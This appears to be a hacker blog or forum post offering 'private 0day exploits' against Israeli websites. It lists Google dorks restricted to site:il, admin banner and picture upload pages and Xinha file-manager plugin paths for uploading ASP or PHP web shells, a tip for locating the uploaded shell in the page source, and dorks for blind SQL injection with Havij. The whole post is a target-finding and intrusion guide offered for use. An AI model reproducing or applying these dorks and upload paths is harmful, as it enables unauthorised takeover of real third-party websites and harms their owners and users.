Hey Guyz ..Today I found some FRESH Private Israel 0Day Exploits . So i thought of sharing with you all....So lets Start....
1). First 0Day Shell Upload ASP | PHP
# Google Dork -|-
'prod1.aspx?pid=' site:il or You can also create your own Dork
# Exploit Upload 1 -|-
/admin/adminbanners.aspx
/admin/adminbanners.aspx
# Exploit Upload 2 -|-
/admin/AdminPics.aspx
/admin/AdminPics.aspx
When you upload your asp or php shell just Check Code Source of the page
you will see your url Shell example:
/banners/1a62aa_bddf_4e3d_8464_f0f62ac8c7.asp
2). Second 0day Upload
# Dork -|-
inurl:/index.php?categoryID= site:il
inurl:/index.php?ukey=auth
inurl:/index.php?ukey=feedback
inurl:/index.php?ukey=pricelist
inurl:/index.php?ukey=auxpage_faq
inurl:/shop/index.php?categoryID=
inurl:ukey=product&productID=
inurl:/index.php?categoryID= site:il
inurl:/index.php?ukey=auth
inurl:/index.php?ukey=feedback
inurl:/index.php?ukey=pricelist
inurl:/index.php?ukey=auxpage_faq
inurl:/shop/index.php?categoryID=
inurl:ukey=product&productID=
# Exploit -|-
/published/common/html/xinha/plugins/ImageManager/manager.php
/published/common/html/xinha/plugins/ImageManager/manager.php
#Exploit -|-
/published/common/html/xinha/plugins/ExtendedFileManager/manager.php
/published/common/html/xinha/plugins/ExtendedFileManager/manager.php
3). Third 0day Upload Blind Sql Injection
This just Targets with havij or manually and admin page of the script is www.target.co.il/QAdmin
# Dork -|-
intext:cybercity site:il
inurl:index.php?id= <-- Page 4
intext:medicine site:il
inurl:index.php?id= <-- page 2
0 comments:
Post a Comment